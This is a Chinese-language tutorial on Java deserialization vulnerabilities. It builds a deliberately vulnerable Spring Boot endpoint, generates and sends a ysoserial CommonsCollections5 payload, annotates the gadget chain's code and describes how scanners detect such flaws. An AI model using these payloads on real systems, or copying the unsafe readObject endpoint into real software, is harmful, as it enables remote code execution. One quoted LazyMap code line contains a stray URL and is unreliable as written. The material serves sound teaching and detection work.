带你掌握java反序列化漏洞及其检测 _反序列

学向勤中得，萤窗万卷书。这篇文章主要讲述带你掌握java反序列化漏洞及其检测相关的知识，希望能为你提供帮助。

??摘要：在本文中将先介绍java反序列化漏洞的原理，然后在此基础上介绍安全工具如何检测、扫描此类漏洞。

作者： alpha1e0。
1、java反序列化简介java反序列化是近些年安全业界研究的重点领域之一，在ApacheCommons Collections 、JBoss 、WebLogic 等常见容器、库中均发现有该类漏洞，而且该类型漏洞容易利用，造成的破坏很大，因此影响广泛。

在本文中将先介绍java反序列化漏洞的原理，然后在此基础上介绍安全工具如何检测、扫描此类漏洞。
1.1 什么是反序列化
Java 序列化是指把 Java 对象转换为字节序列的过程，序列化后的字节数据可以保存在文件、数据库中；而Java 反序列化是指把字节序列恢复为 Java 对象的过程。如下图所示：

序列化和反序列化通过ObjectInputStream.readObject()和ObjectOutputStream.writeObject()方法实现。
在java中任何类如果想要序列化必须实现java.io.Serializable接口，例如：

public class Hello implements java.io.Serializable {
String name;
}

java.io.Serializable其实是一个空接口，在java中该接口的唯一作用是对一个类做一个标记让jre确定这个类是可以序列化的。

同时java中支持在类中定义如下函数：

private void writeObject(java.io.ObjectOutputStream out)
throws IOException
private void readObject(java.io.ObjectInputStream in)
throws IOException, ClassNotFoundException;

这两个函数不是java.io.Serializable的接口函数，而是约定的函数，如果一个类实现了这两个函数，那么在序列化和反序列化的时候ObjectInputStream.readObject()和ObjectOutputStream.writeObject()会主动调用这两个函数。这也是反序列化产生的根本原因

例如：

public class Hello implements java.io.Serializable {
String name;
private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
Runtime.getRuntime().exec(name);
}
}

该类在反序列化的时候会执行命令，我们构造一个序列化的对象，name为恶意命令，那么在反序列化的时候就会执行恶意命令。

在反序列化的过程中，攻击者仅能够控制“数据”，无法控制如何执行，因此必须借助被攻击应用中的具体场景来实现攻击目的，例如上例中存在一个执行命令的可以序列化的类（Hello），利用该类的readObject函数中的命令执行场景来实现攻击

1.2 反序列化漏洞示例复现
在这里我们构造一个有漏洞的靶场进行漏洞复现测试：使用spring-boot编写一个可以接收http数据并反序列化的应用程序。

使用 https://start.spring.io/ 生成一个spring-boot应用，选择Maven Project、java8

下载到本地，导入IDE，修改 pom.xml 加入 Apache CommonsCollections 3.1 依赖（该版本存在反序列化漏洞）

< dependency>
< groupId> commons-collections< /groupId>
< artifactId> commons-collections< /artifactId>
< version> 3.1< /version>
< /dependency>

修改 DemoApplication.java 为如下代码

package com.example.demo;

import java.io.IOException;
import java.io.ObjectInputStream;
import javax.servlet.http.HttpServletRequest;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.bind.annotation.GetMapping;

@SpringBootApplication
@RestController
public class DemoApplication {
public static void main(String[] args) {
SpringApplication.run(DemoApplication.class, args);
}

@GetMapping("/hello")
public String hello() {
return "hello world";
}

// 反序列化接口
@PostMapping("/rmi")
public String rmi(HttpServletRequest request) {
try {
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = (Object) ois.readObject();
return "unmarshal " + obj.getClass().getName() + " ok";
} catch (ClassNotFoundException | IOException e) {
return "unmarshal failed";
}
}
}

此时我们就完成了一个有 Apache Commons Collections 漏洞的验证靶场，启动该靶场应用

我们使用 ??ysoserial?? 生成攻击payload：

java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsCollections5 "calc.exe" > poc

然后使用 ??httpie?? 发送攻击payload（poc）

http post http://127.0.0.1:8080/rmi < poc

这时候就可以看到poc中的命令执行了

1.3 反序列化漏洞解析
在1.2 的示例中我们使用了ysoserial 的 CommonsCollections5 这个payload，本节我们对此poc进行分析

public BadAttributeValueExpException getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(// 执行“链条”该类的transform会调用transformer使用反射执行命令
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),// 这里是我们输入的命令 calc.exe
new ConstantTransformer(1) };

final Map innerMap = new HashMap();

final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); // 该类的get接口如果输入的key找不到会调用transform函数触发命令执行

TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); // 该类的toString会最终调用lazyMap.get

BadAttributeValueExpException val = new BadAttributeValueExpException(null); // 最终反序列化的类，readObject会调用entry.toString
Field valfield = val.getClass().getDeclaredField("val");
Reflections.setAccessible(valfield);
valfield.set(val, entry);

Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

return val;
}

可以最终反序列化的对象为 javax.management.BadAttributeValueExpException ，在该类提供了 readObject 方法，在其中有问题的地方为

val = valObj.toString();

这里的 valObj 为 TiedMapEntry(lazyMap, “foo”) ，该类的toString方法

public String toString() {
return this.getKey() + "=" + this.getValue();
}

其中 this.getValue 为

public Object getValue() {
return this.map.get(this.key);
}

而 this.map 为 lazyMap = LazyMap.decorate(innerMap, transformerChain)，在 lazyMap 中

public Object get(Object key) {
if (!super.map.containsKey(key)) {// 当找不到key的时候调用transform
Object value = https://www.songbingjia.com/android/this.factory.transform(key);
super.map.put(key, value);
return value;
} else {
return super.map.get(key);
}
}

在其中看到，没有找到key的时候，调用了 this.factory.transform(key)
而this.factory为我们构造的包含payload的执行链 transformerChain 该transformer会最终通过反射执行命令。
2、java反序列化漏洞检测在1中的原理介绍中，我们可以看到，反序列化漏洞需要依赖执行链来完成攻击payload执行。由于反序列化漏洞的特性，在检测的时候漏洞扫描工具一般聚焦已知漏洞的检测，而未知漏洞的检测，安全工具能力非常有限，一般需要专业人员通过安全审计、代码审计等方式发现。

java反序列化漏洞依赖于两个因素：
1. 应用是否有反序列化接口
2. 应用中是否包含有漏洞的组件
因此对应的漏洞扫描工具也需要根据这两个因素进行检测。
2.1 白盒工具检测
白盒代码审计工具，可通过在调用链中查找是否有发序列化的操作：

调用链的入口不同框架是不同的，例如在1.2例子中调用链的入口为spring-boot的controller。
调用链中一旦发现有发序列化操作ObjectInputStream.readObject()则该接口存在序列化操作

但仅仅依靠以上信息不足以判断是否存在漏洞，还需要判断代码中是否有存在*执行链**的三方依赖。在java中，一般通过分析 pox.xmlbuild.gradle 文件来分析是否包含有漏洞的组件。
2.2 黑盒漏洞扫描器检测
web漏洞扫描器检测原理和白盒工具不一样。

首先漏洞扫描器要解决的是识别出反序列化的请求，在这里需要注意的是web漏洞扫描是无法通过爬虫方式直接发现反序列化接口的，因此往往需要配合其他web漏洞扫描器的组件（例如代理组件）来识别反序列化接口，如下图所示

【带你掌握java反序列化漏洞及其检测】

如今web漏洞扫描器都提供了代理组件来发现应用的http请求，爬虫组件可通过前台页面触发请求进入代理组件；但在API场景下，还是需要测试人员进行API调用该操作才能够产生http请求数据。

在截获到http请求数据后，代理组件可以通过两种方式判断一个请求是否是序列化请求：
1. 通过http请求的Content-Type，具体来说ContentType: application/x-java-serialized-object 是序列化请求的请求头
2. 检查请求数据的开头是否是 0xaced，有时候序列化请求不存在正确的content-type，此时需要根据数据来判断是否是序列化请求

在确定一个接口是序列化接口的时候会漏洞扫描器会发送探测payload判断接口是否有反序列化漏洞，这里的攻击payload类似于1.2节中使用的??ysoserial?? 工具，由于绝大多数情况下不可能看到回显（http返回数据没有攻击执行结果），因此只能进行盲注，即发送 sleep 10 这样的命令，根据响应时间判断是否有漏洞。?
?